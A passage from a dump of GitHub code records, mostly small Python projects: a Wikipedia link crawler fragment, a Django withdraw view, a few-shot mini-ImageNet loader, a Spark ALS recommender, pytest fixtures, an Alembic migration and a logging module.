(title, ) + rest_of_chain\n seen_pages.add(link)\n\n\nif __name__ == '__main__':\n \n previous_relations = [(\"Jesus\", ())]\n while True:\n next_relations = []\n for from_page, to_pages in previous_relations:\n for new_from, new_to_pages in 
store_backlink_value(from_page, to_pages):\n                next_relations.append((new_from, new_to_pages))  # queue the newly discovered page so the next round expands it; appending the old pair stalled the crawl\n                next_steps = \" => \".join(new_to_pages)\n                print(\"%s => %s\" % (new_from, next_steps))\n        previous_relations = next_relations\n        \n\n\n\n\n    #for link in loose_starting_title('Jesus'):\n    #    print(link)\n    \n\n\n\n","repo_name":"stestagg/hackthewiki","sub_path":"loosejesus.py","file_name":"loosejesus.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42726360129","text":"test = list()\r\ntest.append('Alex')\r\ntest.append(21)\r\ngalera = list()\r\ngalera.append(test[:])\r\ntest[0] = 'Maria'\r\ntest[1] = 22\r\ngalera.append(test[:])\r\nprint(galera)\r\n\r\ntodos = [['Joao', 19], ['Ana', 33], ['Joaquim', 13], ['Maria', 45]]\r\nprint(todos)\r\nprint(todos[0][0])\r\nfor p in todos:\r\n    print(f'{p[0]}, tem {p[1]} anos de idade!')\r\n\r\npessoal = list()\r\ndado = list()\r\nfor c in range(0,3):\r\n    dado.append(str(input('Nome: ')))\r\n    dado.append(int(input('Idade: ')))\r\n    pessoal.append(dado[:])\r\n    dado.clear()\r\nprint(pessoal)\r\ntotmaior = totmenor = 0\r\nfor p in pessoal:\r\n    if p[1] >= 21:\r\n        print(f'{p[0]} é maior de idade!')\r\n        totmaior += 1\r\n    else:\r\n        print(f'{p[0]} é menor de idade!')\r\n        totmenor += 1\r\nprint(f'Temos {totmaior} maiores e {totmenor} menor de idade!')","repo_name":"Alex-Carrijo/Curso_Em_Videos_Treino","sub_path":"aula_Lista2.py","file_name":"aula_Lista2.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44404772264","text":"import logging\nfrom django.http import HttpResponse\nfrom django.views import View\n\nfrom demo.utils import LockedAtomicTransaction\nfrom .models import Account, Transaction\nlogger = logging.getLogger(\"django\")\n\n\nclass WithdrawView(View):\n    def get(self, request, *args, **kwargs):\n        if request.user.is_authenticated:\n            holder = Account.objects.filter(user=request.user).first()\n            current = holder.current\n            return HttpResponse(current)\n        return HttpResponse(\"\")\n\n    def post(self, request, *args, **kwargs):\n        with LockedAtomicTransaction(Account):\n            holder = Account.objects.filter(user=request.user).first()\n            withdrawl = 1\n            current = holder.make_withdrawl(withdrawl)\n            Transaction.objects.create(\n                holder=holder,\n                balance=current,\n                transaction=withdrawl\n            )\n\n        return HttpResponse(current)\n","repo_name":"wrdeman/django_logstash_elasticsearch","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4634096047","text":"size = int(input(\"size of list \"))\nUserList = [int(input(\"Enter element \")) for i in range(0,size)]\n\ndef Min(UserList):\n    if len(UserList) ==1:\n        return UserList[0]\n    else:\n        number = Min(UserList[1:])\n        if number < UserList[0]:\n            return number\n        else:\n            return UserList[0]\n\nprint(Min(UserList))\n","repo_name":"viplash4/AmisHomework","sub_path":"дз рекурсія/recursion task1.py","file_name":"recursion task1.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26259969067","text":"import glob\nimport json\nimport os\n\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\nimport tqdm\nimport concurrent.futures\nimport pickle\nimport 
torch\nfrom torchvision import transforms\nfrom PIL import ImageFile\n\nfrom data.data_processing.augment import augment_image\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\nclass MiniImagenetDataset(Dataset):\n def __init__(self, config, mode):\n \"\"\"\n A data provider class inheriting from Pytorch's Dataset class. It takes care of creating task sets for\n our few-shot learning model training and evaluation\n :param config: Arguments in the form of a Bunch object. Includes all hyperparameters necessary for the\n data-provider. For transparency and readability reasons to explicitly set as self.object_name all arguments\n required for the data provider, such that the reader knows exactly what is necessary for the data provider/\n \"\"\"\n self.config = config\n self.mode = mode\n self.data_loaded_in_memory = False\n\n self.index = 0\n\n self.augment_images = False\n\n self.datasets = self.load_dataset()\n\n self.indexes = 0\n self.dataset_size_dict = {key: len(self.datasets[key]) for key in list(self.datasets.keys())}\n self.label_set = self.get_label_set()\n self.data_length = np.sum([len(self.datasets[key]) for key in self.datasets.keys()])\n\n print(\"data\", self.data_length)\n self.observed_seed_set = None\n\n def set_random_state(self):\n train_rng = np.random.RandomState(seed=self.config.train_seed)\n train_seed = train_rng.randint(1, 999999)\n self.config.train_seed = train_seed\n self.init_seed = self.config.train_seed\n self.seed = self.config.train_seed\n\n def load_dataset(self):\n \"\"\"\n Loads a dataset's dictionary files.\n in the config object.\n :return: The current dataset\n \"\"\"\n # rng = np.random.RandomState(seed=self.seed['val'])\n\n data_image_paths, index_to_label_name_dict_file, label_to_index = self.load_datapaths()\n\n if self.config.load_into_memory:\n print(f\"Loading {self.mode} data into RAM\")\n\n x_loaded = {key: np.zeros(len(value), ) for key, value in data_image_paths.items()}\n with tqdm.tqdm(total=len(data_image_paths)) as pbar_memory_load:\n with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:\n # Process the list of files, but split the work across the process pool to use all CPUs!\n # self.config = SimpleNamespace(**self.config.dict())\n for (class_label, class_images_loaded) in executor.map(self.load_parallel_batch,\n (data_image_paths.items())):\n x_loaded[class_label] = class_images_loaded\n pbar_memory_load.update(1)\n\n data_image_paths = x_loaded\n self.data_loaded_in_memory = True\n\n return data_image_paths\n\n def load_datapaths(self):\n \"\"\"\n If saved json dictionaries of the data are available, then this method loads the dictionaries such that the\n data is ready to be read. 
If the json dictionaries do not exist, then this method calls get_data_paths()\n which will build the json dictionary containing the class to filepath samples, and then store them.\n :return: data_image_paths: dict containing class to filepath list pairs.\n index_to_label_name_dict_file: dict containing numerical indexes mapped to the human understandable\n string-names of the class\n label_to_index: dictionary containing human understandable string mapped to numerical indexes\n \"\"\"\n dataset_dir = 'dataset_files/mini_imagenet'\n data_path_file = f\"{dataset_dir}/{self.mode}_mini_imagenet_full_size.json\"\n self.index_to_label_name_dict_file = f\"{dataset_dir}/{self.mode}_map_to_label_name_mini_imagenet_full_size.json\"\n self.label_name_to_map_dict_file = f\"{dataset_dir}/{self.mode}_label_name_to_map_mini_imagenet_full_size.json\"\n\n try:\n data_image_paths = self.load_from_json(filename=data_path_file)\n label_to_index = self.load_from_json(filename=self.label_name_to_map_dict_file)\n index_to_label_name_dict_file = self.load_from_json(filename=self.index_to_label_name_dict_file)\n return data_image_paths, index_to_label_name_dict_file, label_to_index\n except:\n print(\"Mapped data paths can't be found, remapping paths..\")\n data_image_paths, code_to_label_name, label_name_to_code = self.get_data_paths()\n self.save_to_json(dict_to_store=data_image_paths, filename=data_path_file)\n self.save_to_json(dict_to_store=code_to_label_name, filename=self.index_to_label_name_dict_file)\n self.save_to_json(dict_to_store=label_name_to_code, filename=self.label_name_to_map_dict_file)\n return self.load_datapaths()\n\n def save_to_json(self, filename, dict_to_store):\n with open(os.path.abspath(filename), 'w') as f:\n json.dump(dict_to_store, fp=f)\n\n def load_from_json(self, filename):\n with open(filename, mode=\"r\") as f:\n load_dict = json.load(fp=f)\n\n return load_dict\n\n def get_data_paths(self):\n \"\"\"\n Method that scans the dataset directory and generates class to image-filepath list dictionaries.\n :return: data_image_paths: dict containing class to filepath list pairs.\n index_to_label_name_dict_file: dict containing numerical indexes mapped to the human understandable\n string-names of the class\n label_to_index: dictionary containing human understandable string mapped to numerical indexes\n \"\"\"\n path_template = os.path.join(self.config.dataset_path, self.mode, '*', '*.jpg')\n print(\"Get images in a form: \", path_template)\n paths = sorted(glob.glob(path_template))\n data_image_path_list_raw = [os.path.abspath(path) for path in paths]\n labels = sorted({self.get_label_from_path(path) for path in data_image_path_list_raw})\n\n idx_to_label_name = {idx: label for idx, label in enumerate(labels)}\n label_name_to_idx = {label: idx for idx, label in enumerate(labels)}\n data_image_path_dict = {idx: [] for idx in list(idx_to_label_name.keys())}\n with tqdm.tqdm(total=len(data_image_path_list_raw)) as pbar_error:\n # Process the list of files and put them into a dictionary of classes with the list of the image paths\n for image_file in data_image_path_list_raw:\n pbar_error.update(1)\n label = self.get_label_from_path(image_file)\n data_image_path_dict[label_name_to_idx[label]].append(image_file)\n\n return data_image_path_dict, idx_to_label_name, label_name_to_idx\n\n def get_label_set(self):\n \"\"\"\n Generates a set containing all class numerical indexes\n :return: A set containing all class numerical indexes\n \"\"\"\n index_to_label_name_dict_file = 
self.load_from_json(filename=self.index_to_label_name_dict_file)\n return set(list(index_to_label_name_dict_file.keys()))\n\n def get_index_from_label(self, label):\n \"\"\"\n Given a class's (human understandable) string, returns the numerical index of that class\n :param label: A string of a human understandable class contained in the dataset\n :return: An int containing the numerical index of the given class-string\n \"\"\"\n label_to_index = self.load_from_json(filename=self.label_name_to_map_dict_file)\n return label_to_index[label]\n\n def get_label_from_index(self, index):\n \"\"\"\n Given an index return the human understandable label mapping to it.\n :param index: A numerical index (int)\n :return: A human understandable label (str)\n \"\"\"\n index_to_label_name = self.load_from_json(filename=self.index_to_label_name_dict_file)\n return index_to_label_name[index]\n\n def get_label_from_path(self, filepath):\n \"\"\"\n Given a path of an image generate the human understandable label for that image.\n :param filepath: The image's filepath\n :return: A human understandable label.\n \"\"\"\n label_bits = filepath.split(\"/\")\n label = \"/\".join([label_bits[idx] for idx in self.config.indexes_of_folders_indicating_class])\n if self.config.labels_as_int:\n label = int(label)\n return label\n\n def load_image(self, image_path):\n \"\"\"\n Given an image filepath and the number of channels to keep, load an image and keep the specified channels\n :param image_path: The image's filepath\n :return: An image array of shape (h, w, channels), whose values range between 0.0 and 1.0.\n \"\"\"\n if not self.data_loaded_in_memory:\n image = Image.open(image_path)\n image = image.resize(self.config.input_size).convert('RGB')\n image = np.array(image, np.float32)\n image = image / 255.0\n else:\n image = image_path\n\n return image\n\n def load_parallel_batch(self, inputs):\n \"\"\"\n Load a batch of images, given a list of filepaths\n :return: A numpy array of images of shape batch, height, width, channels\n \"\"\"\n class_label, batch_image_paths = inputs\n image_batch = []\n\n if self.data_loaded_in_memory:\n for image_path in batch_image_paths:\n image_batch.append(np.copy(image_path))\n image_batch = np.array(image_batch, dtype=np.float32)\n else:\n image_batch = [self.load_image(image_path=image_path) for image_path in batch_image_paths]\n image_batch = np.array(image_batch, dtype=np.float32)\n image_batch = self.preprocess_data(image_batch)\n\n return class_label, image_batch\n\n def preprocess_data(self, x):\n \"\"\"\n Preprocesses data such that their shapes match the specified structures\n :param x: A data batch to preprocess\n :return: A preprocessed data batch\n \"\"\"\n x_shape = x.shape\n x = np.reshape(x, (-1, x_shape[-3], x_shape[-2], x_shape[-1]))\n if self.config.reverse_channels is True:\n reverse_photos = np.ones(shape=x.shape)\n for channel in range(x.shape[-1]):\n reverse_photos[:, :, :, x.shape[-1] - 1 - channel] = x[:, :, :, channel]\n x = reverse_photos\n x = x.reshape(x_shape)\n return x\n\n def reconstruct_original(self, x):\n \"\"\"\n Applies the reverse operations that preprocess_data() applies such that the data returns to their original form\n :param x: A batch of data to reconstruct\n :return: A reconstructed batch of data\n \"\"\"\n x = x * 255.0\n return x\n\n def get_set(self, seed, augment_images=False):\n \"\"\"\n Generates a task-set to be used for training or evaluation\n :param set_name: The name of the set to use, e.g. 
\"train\", \"val\" etc.\n :return: A task-set containing an image and label support set, and an image and label target set.\n \"\"\"\n # seed = seed % self.config.total_unique_tasks\n rng = np.random.RandomState(seed)\n selected_classes = rng.choice(list(self.dataset_size_dict.keys()),\n size=self.config.num_samples_per_class, replace=False)\n rng.shuffle(selected_classes)\n k_list = rng.randint(0, 4, size=self.config.num_samples_per_class)\n k_dict = {selected_class: k_item for (selected_class, k_item) in zip(selected_classes, k_list)}\n episode_labels = [i for i in range(self.config.num_samples_per_class)]\n class_to_episode_label = {selected_class: episode_label for (selected_class, episode_label) in\n zip(selected_classes, episode_labels)}\n\n x_images = []\n y_labels = []\n\n for class_entry in selected_classes:\n choose_samples_list = rng.choice(self.dataset_size_dict[class_entry],\n size=self.config.num_samples_per_class + self.config.num_target_samples,\n replace=False)\n class_image_samples = []\n class_labels = []\n for sample in choose_samples_list:\n choose_samples = self.datasets[class_entry][sample]\n _, x_class_data = self.load_parallel_batch([None, choose_samples])[0]\n k = k_dict[class_entry]\n x_class_data = augment_image(image=x_class_data, k=k,\n channels=self.image_channel, augment_bool=augment_images,\n dataset_name=self.dataset_name, config=self.config)\n class_image_samples.append(x_class_data)\n class_labels.append(int(class_to_episode_label[class_entry]))\n class_image_samples = torch.stack(class_image_samples)\n x_images.append(class_image_samples)\n y_labels.append(class_labels)\n\n x_images = torch.stack(x_images)\n y_labels = np.array(y_labels, dtype=np.float32)\n\n support_set_images = x_images[:, :self.config.num_samples_per_class]\n support_set_labels = y_labels[:, :self.config.num_samples_per_class]\n target_set_images = x_images[:, self.config.num_samples_per_class:]\n target_set_labels = y_labels[:, self.config.num_samples_per_class:]\n\n return support_set_images, target_set_images, support_set_labels, target_set_labels, seed\n\n def __len__(self):\n return self.data_length // self.config.batch_size\n\n def set_augmentation(self, augment_images):\n self.augment_images = augment_images\n\n def switch_set(self, current_iter=None):\n if self.mode == \"train\":\n self.update_seed(seed=self.init_seed + current_iter)\n\n def update_seed(self, seed=100):\n self.seed = seed\n\n def __getitem__(self, idx):\n support_set_images, target_set_image, support_set_labels, target_set_label, seed = \\\n self.get_set(seed=self.seed + idx, augment_images=self.augment_images)\n\n return support_set_images, target_set_image, support_set_labels, target_set_label, seed\n\n# class MetaLearningSystemDataLoader(object):\n# def __init__(self, config, current_iter=0):\n# \"\"\"\n# Initializes a meta learning system dataloader. The data loader uses the Pytorch DataLoader class to parallelize\n# batch sampling and preprocessing.\n# :param config: An arguments NamedTuple containing all the required arguments.\n# :param current_iter: Current iter of experiment. 
Is used to make sure the data loader continues where it left\n# of previously.\n# \"\"\"\n# self.num_of_gpus = config.num_of_gpus\n# self.batch_size = config.batch_size\n# self.samples_per_iter = config.samples_per_iter\n# self.num_workers = config.num_dataprovider_workers\n# self.total_train_iters_produced = 0\n# self.dataset = MiniImagenetDataset(config=config)\n# self.batches_per_iter = config.samples_per_iter\n# self.full_data_length = self.dataset.data_length\n# self.continue_from_iter(current_iter=current_iter)\n# self.config = config\n#\n# def get_dataloader(self):\n# \"\"\"\n# Returns a data loader with the correct set (train, val or test), continuing from the current iter.\n# :return:\n# \"\"\"\n# return DataLoader(self.dataset, batch_size=(self.num_of_gpus * self.batch_size * self.samples_per_iter),\n# shuffle=False, num_workers=self.num_workers, drop_last=True)\n#\n# def continue_from_iter(self, current_iter):\n# \"\"\"\n# Makes sure the data provider is aware of where we are in terms of training iterations in the experiment.\n# :param current_iter:\n# \"\"\"\n# self.total_train_iters_produced += (current_iter * (self.num_of_gpus * self.batch_size * self.samples_per_iter))\n#\n# def get_train_batches(self, total_batches=-1, augment_images=False):\n# \"\"\"\n# Returns a training batches data_loader\n# :param total_batches: The number of batches we want the data loader to sample\n# :param augment_images: Whether we want the images to be augmented.\n# \"\"\"\n# if total_batches == -1:\n# self.dataset.data_length = self.full_data_length\n# else:\n# self.dataset.data_length[\"train\"] = total_batches * self.dataset.batch_size\n# self.dataset.switch_set(set_name=\"train\", current_iter=self.total_train_iters_produced)\n# self.dataset.set_augmentation(augment_images=augment_images)\n# self.total_train_iters_produced += (self.num_of_gpus * self.batch_size * self.samples_per_iter)\n# for sample_id, sample_batched in enumerate(self.get_dataloader()):\n# yield sample_batched\n#\n# def get_val_batches(self, total_batches=-1, augment_images=False):\n# \"\"\"\n# Returns a validation batches data_loader\n# :param total_batches: The number of batches we want the data loader to sample\n# :param augment_images: Whether we want the images to be augmented.\n# \"\"\"\n# if total_batches == -1:\n# self.dataset.data_length = self.full_data_length\n# else:\n# self.dataset.data_length['val'] = total_batches * self.dataset.batch_size\n# self.dataset.switch_set(set_name=\"val\")\n# self.dataset.set_augmentation(augment_images=augment_images)\n# for sample_id, sample_batched in enumerate(self.get_dataloader()):\n# yield sample_batched\n#\n# def get_test_batches(self, total_batches=-1, augment_images=False):\n# \"\"\"\n# Returns a testing batches data_loader\n# :param total_batches: The number of batches we want the data loader to sample\n# :param augment_images: Whether we want the images to be augmented.\n# \"\"\"\n# if total_batches == -1:\n# self.dataset.data_length = self.full_data_length\n# else:\n# self.dataset.data_length['test'] = total_batches * self.dataset.batch_size\n# self.dataset.switch_set(set_name='test')\n# self.dataset.set_augmentation(augment_images=augment_images)\n# for sample_id, sample_batched in enumerate(self.get_dataloader()):\n# yield 
sample_batched\n","repo_name":"gregiberri/meta_learning","sub_path":"data/datasets/mini_imagenet.py","file_name":"mini_imagenet.py","file_ext":"py","file_size_in_byte":18771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"40085073427","text":"import pytube\n\n\ndef main():\n while True:\n url = input(\"Url do Vídeo: \")\n yt = pytube.YouTube(url)\n print(f\"Titulo do Vídeo: {yt.title}\")\n stream = yt.streams.get_highest_resolution()\n print(\"BAIXANDO VIDEO...\")\n stream.download()\n print(\"Vídeo baixado, confira na sua pasta.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"matheustxaguiar/video-downloader","sub_path":"videodownloader.py","file_name":"videodownloader.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35928740979","text":"def s(n):\n ret = 0\n while n > 0:\n ret += n % 10\n n //= 10\n return ret\n\nans = 0\nN, A, B = map(int, input().split())\n\nfor i in range(N+1):\n if A <= s(i) <= B:\n ans += i\n\nprint(ans)","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/abc083_b.py","file_name":"abc083_b.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7431596519","text":"\"\"\"model update\n\nRevision ID: c80cb90f0a1a\nRevises: 8e097ae60858\nCreate Date: 2022-11-19 22:17:06.065596\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c80cb90f0a1a'\ndown_revision = '8e097ae60858'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('comments', 'post_time')\n op.drop_column('comments', 'poster_name')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('comments', sa.Column('poster_name', sa.VARCHAR(), autoincrement=False, nullable=False))\n op.add_column('comments', sa.Column('post_time', sa.VARCHAR(), autoincrement=False, nullable=False))\n # ### end Alembic commands ###\n","repo_name":"19alema/flask-blog-app","sub_path":"migrations/versions/c80cb90f0a1a_model_update.py","file_name":"c80cb90f0a1a_model_update.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34337003413","text":"import uuid\n\nimport pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\n\nfrom api.main import app as fastapi_instance\nfrom config.api_config import ApiConfig\nfrom modules.iam.application.services import IamService\nfrom seedwork.infrastructure.database import Base\n\n\n@pytest.fixture\ndef engine():\n config = ApiConfig()\n eng = create_engine(config.DATABASE_URL, echo=config.DATABASE_ECHO)\n\n with eng.begin() as connection:\n Base.metadata.drop_all(connection)\n Base.metadata.create_all(connection)\n return eng\n\n\n@pytest.fixture\ndef db_session(engine):\n with Session(engine) as session:\n yield session\n\n\n@pytest.fixture\ndef api():\n return fastapi_instance\n\n\n@pytest.fixture\ndef api_client(api, app):\n client = TestClient(api)\n return client\n\n\n@pytest.fixture\ndef authenticated_api_client(api, app):\n access_token = uuid.uuid4()\n with app.transaction_context() as ctx:\n iam: IamService = ctx[IamService]\n current_user = iam.create_user(\n uuid.UUID(int=1),\n email=\"user1@example.com\",\n password=\"password\",\n access_token=str(access_token),\n is_superuser=False,\n )\n headers = {\"Authorization\": f\"bearer {access_token}\"}\n client = TestClient(api, headers=headers)\n client.current_user = current_user\n return client\n\n\n@pytest.fixture\ndef app(api, db_session):\n app = api.container.application()\n return app\n","repo_name":"pgorecki/python-ddd","sub_path":"src/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":723,"dataset":"github-code","pt":"35"} +{"seq_id":"28216379078","text":"class Solution:\n def validArrangement(self, pairs):\n from collections import defaultdict\n graf = defaultdict(list)\n gout = defaultdict(int)\n gin = defaultdict(int)\n for x, y in pairs:\n graf[x].append(y)\n gout[x]+=1\n gin[y]+=1\n\n s = pairs[0][0]\n for x in gout:\n if gout[x] == gin[x] +1:\n s = x\n break \n \n rasp = []\n def euler(x):\n while graf[x]:\n euler(graf[x].pop()) \n rasp.append(x)\n\n euler(s)\n rasp.reverse()\n r = [[rasp[i], rasp[i+1]] for i in range(len(rasp)-1)]\n return r\nsol = Solution()\nprint(sol.validArrangement([[5,1],[4,5],[11,9],[9,4]])) \n","repo_name":"Narcis2151/Fundamental-Algorithms","sub_path":"Homework3/E4.py","file_name":"E4.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34447936239","text":"import operator\nimport re\nimport math\nfrom pyspark import SparkContext\nfrom pyspark import SparkConf\nimport pyspark.mllib.recommendation as rd\n\ndef trainValidation(td,vd):\n d = dict()\n for rank in [5,10,15,20,50,100]:\n for it in [5,10,15,20,25]:\n for lam in [0.05,0.1,1.0,5.0,10.0]:\n rmse = trainModel(td,vd,rank,it,lam)\n d[rmse] = (rank,it,lam)\n# {rmse:(rank,it,lam)} rmse is the distance () is the paras\n 
print(d[min(d)])\n    return d[min(d)]\n\ndef trainModel (traindata,validationdata,r,i,l):\n    model = rd.ALS.train(traindata,r,i,l)\n    return computeRmse(model,validationdata)\n\ndef computeRmse(model,validationdata):\n\n    predictedRDD = model.predictAll(validationdata.map(lambda x:(x[0],x[1])))\n    predictedANDRatings = predictedRDD.map(lambda x:((x[0],x[1]),x[2]))\n    \n    return math.sqrt(predictedANDRatings.join(validationdata.map(lambda x:((x[0],x[1]),x[2]))).map(lambda x:math.pow((x[1][0]-x[1][1]),2)).reduce(operator.add)/validationdata.count())\n\n\nconf = SparkConf().setAppName(\"miniproject\").setMaster(\"local[*]\")\nsc = SparkContext.getOrCreate(conf)\n\nrdd = sc.textFile(\"/home/simon/Downloads/ml-100k/u1.base\")\n\nrawRatings = rdd.map(lambda line:line.split('\\t')[0:3])\nratings = rawRatings.map(lambda x:rd.Rating(int(x[0]),int(x[1]),float(x[2])))\n\n'''\nmodel = rd.ALS.train(ratings,50,10,0.01)\npredictedRating = model.predict(3,132)\nprint (predictedRating)\ntopKRecs = model.recommendProducts(789, 10)\nprint(topKRecs)\n'''\n\n(traindata,validationdata,testdata) = ratings.randomSplit([0.8,0.1,0.1]) #return traindata, validation data, test data\n#traindata.persist(),validationdata,testdata\n\n# trainValidation now returns the best (rank, iterations, lambda); retrain a model with them\nbestParams = trainValidation(traindata,validationdata)\nbestModel = rd.ALS.train(traindata, bestParams[0], bestParams[1], bestParams[2])\n\ntestRmse = computeRmse(bestModel,testdata)\n\n\n","repo_name":"bigDataMLProject/Shrimp_hust","sub_path":"recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9850565598","text":"#!/usr/bin/env python\n# coding=utf-8\nimport sys\nimport os\nimport socket\nimport traceback\nimport logging\nimport logging.handlers\nfrom toughlib import dispatch\nfrom toughlib.utils import safeunicode\nfrom twisted.python import log as txlog\nimport functools\n\nEVENT_TRACE = 'syslog_trace'\nEVENT_INFO = 'syslog_info'\nEVENT_DEBUG = 'syslog_debug'\nEVENT_ERROR = 'syslog_error'\nEVENT_EXCEPTION = 'syslog_exception'\nEVENT_SETUP = 'syslog_setup'\n\n\ndef string_to_level(log_level):\n    if log_level == \"CRITICAL\":\n        return logging.CRITICAL\n    if log_level == \"ERROR\":\n        return logging.ERROR\n    if log_level == \"WARNING\":\n        return logging.WARNING\n    if log_level == \"INFO\":\n        return logging.INFO\n    if log_level == \"DEBUG\":\n        return logging.DEBUG\n    return logging.NOTSET\n\nclass SimpleLogger:\n\n    def __init__(self,config, name=\"toughstruct\"):\n        self.name = name\n        self.setup(config)\n\n    def setup(self, config):\n        self.level = string_to_level(config.syslog.level)\n        if config.system.debug:\n            self.level = string_to_level(\"DEBUG\")\n\n        self.log = logging.getLogger(self.name)\n        self.log.setLevel(self.level)\n\n        handler = logging.StreamHandler(sys.stdout)\n        formatter = logging.Formatter(u'%(message)s')\n        handler.setFormatter(formatter)\n        self.log.addHandler(handler)\n\n        self.info = self.log.info\n        self.debug = self.log.debug\n        self.warning = self.log.warning\n        self.error = self.log.error\n        self.critical = self.log.critical\n        self.msg = self.log.info\n        self.err = self.log.error\n\n    def event_syslog_setup(self,config):\n        self.setup(config)\n\n    def event_syslog_info(self, msg):\n        self.info(msg)\n\n    def event_syslog_debug(self, msg):\n        self.debug(msg)\n\n    def event_syslog_error(self, msg):\n        self.error(msg)\n\n    def event_syslog_exception(self, err):\n        self.log.exception(err) \n\n    def emit(self, eventDict):\n        text = txlog.textFromEventDict(eventDict)\n        if text is None:\n            return\n        if eventDict['isError'] and 'failure' in eventDict:\n            self.error(text)\n        else:\n
            self.info(text)\n\n\nclass Logger:\n\n    def __init__(self,config, name=\"toughstruct\"):\n        self.name = name\n        self.setup(config)\n\n    def setup(self, config):\n        self.syslog_enable = config.syslog.enable\n        self.syslog_server = config.syslog.server\n        self.syslog_port = config.syslog.port\n        self.syslog_level = config.syslog.level\n        self.syslog_shost = config.syslog.shost\n        self.formatter = logging.Formatter(\n            u'%(asctime)s {0} %(name)s %(levelname)-8s %(message)s'.format(self.syslog_shost),'%b %d %H:%M:%S', )\n        self.level = string_to_level(self.syslog_level)\n        if config.system.debug:\n            self.level = string_to_level(\"DEBUG\")\n\n        self.syslogger = logging.getLogger(self.name)\n        self.syslogger.setLevel(self.level)\n\n        if self.syslog_enable and self.syslog_server:\n            handler = logging.handlers.SysLogHandler(address=(self.syslog_server, self.syslog_port))\n            handler.setFormatter(self.formatter)\n            self.syslogger.addHandler(handler)\n        else:\n            handler = logging.StreamHandler(sys.stderr)\n            formatter = logging.Formatter(u'\\x1b[32;40m[%(asctime)s %(name)s]\\x1b[0m %(message)s','%b %d %H:%M:%S',)\n            handler.setFormatter(formatter)\n            self.syslogger.addHandler(handler)\n\n        self.info = self.syslogger.info\n        self.debug = self.syslogger.debug\n        self.warning = self.syslogger.warning\n        self.error = self.syslogger.error\n        self.critical = self.syslogger.critical\n        self.log = self.syslogger.log\n        self.msg = self.syslogger.info\n        self.err = self.syslogger.error\n\n    def event_syslog_setup(self,config):\n        self.setup(config)\n\n    def event_syslog_info(self, msg, **kwargs):\n        self.info(msg)\n\n    def event_syslog_debug(self, msg, **kwargs):\n        self.debug(msg)\n\n    def event_syslog_error(self, msg, **kwargs):\n        self.error(msg)\n\n    def event_syslog_exception(self, err, **kwargs):\n        self.syslogger.exception(err)\n\n    def emit(self, eventDict):\n        text = txlog.textFromEventDict(eventDict)\n        if text is None:\n            return\n        if isinstance(text, (unicode,str,dict,list)):\n            text = safeunicode(text)\n\n        if eventDict['isError'] and 'failure' in eventDict:\n            self.syslogger.exception(text)  # Logger binds no exception attribute in setup(), so log through the underlying logger\n        else:\n            self.info(text)\n\n\nsetup = functools.partial(dispatch.pub, EVENT_SETUP) \n\n\ndef info(message,trace=\"info\",**kwargs):\n    if not isinstance(message, unicode):\n        message = safeunicode(message)\n    if EVENT_INFO in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_INFO,message,**kwargs)\n    if EVENT_TRACE in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_TRACE,trace,message,**kwargs)\n\n\ndef debug(message,**kwargs):\n    if not isinstance(message, unicode):\n        message = safeunicode(message)\n    if EVENT_DEBUG in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_DEBUG,message,**kwargs)\n    if EVENT_TRACE in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_TRACE,\"debug\",message,**kwargs)\n\ndef error(message,**kwargs):\n    if not isinstance(message, unicode):\n        message = safeunicode(message)\n    if EVENT_ERROR in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_ERROR,message,**kwargs)\n    if EVENT_TRACE in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_TRACE,\"error\",message,**kwargs)\n\n\n\ndef exception(err,**kwargs):\n    if EVENT_EXCEPTION in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_EXCEPTION,err,**kwargs)\n    if EVENT_TRACE in dispatch.dispatch.callbacks:\n        dispatch.pub(EVENT_TRACE,\"exception\",repr(err),**kwargs)\n\ndef trace_exception(etype, value, tb):\n    errmsg = \"\".join(traceback.format_exception(etype, value, tb))\n    error(errmsg,trace=\"exception\")\n\nsys.excepthook = 
